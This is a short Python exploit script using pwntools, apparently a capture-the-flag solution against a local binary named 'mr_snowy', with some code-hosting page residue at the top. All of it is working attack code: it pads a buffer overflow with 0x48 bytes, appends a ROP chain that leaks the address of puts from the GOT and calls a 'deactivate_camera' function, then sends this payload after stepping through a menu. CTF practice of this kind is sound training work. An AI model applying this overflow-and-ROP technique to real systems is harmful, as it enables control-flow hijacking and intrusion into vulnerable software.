37 lines
522 B
Python
Executable File
37 lines
522 B
Python
Executable File
#!/bin/env python
|
|
|
|
from pwn import *
|
|
|
|
context.arch = 'amd64'
|
|
offset = 0x48
|
|
|
|
elf = ELF('./mr_snowy')
|
|
p = elf.process()
|
|
|
|
# navigate to the affected read()
|
|
def do_read():
|
|
while True:
|
|
ll = p.read()
|
|
if b'>' in ll:
|
|
break
|
|
|
|
rop = ROP(elf)
|
|
rop.call(elf.symbols['puts'], [elf.got['puts']])
|
|
rop.call(elf.symbols['deactivate_camera'])
|
|
|
|
# assemble payload
|
|
payload = [
|
|
b'\xAA'*offset,
|
|
rop.chain()
|
|
]
|
|
|
|
# skip menu
|
|
do_read()
|
|
p.sendline(b'1')
|
|
do_read()
|
|
|
|
# send payload
|
|
p.sendline(b''.join(payload))
|
|
|
|
p.interactive()
|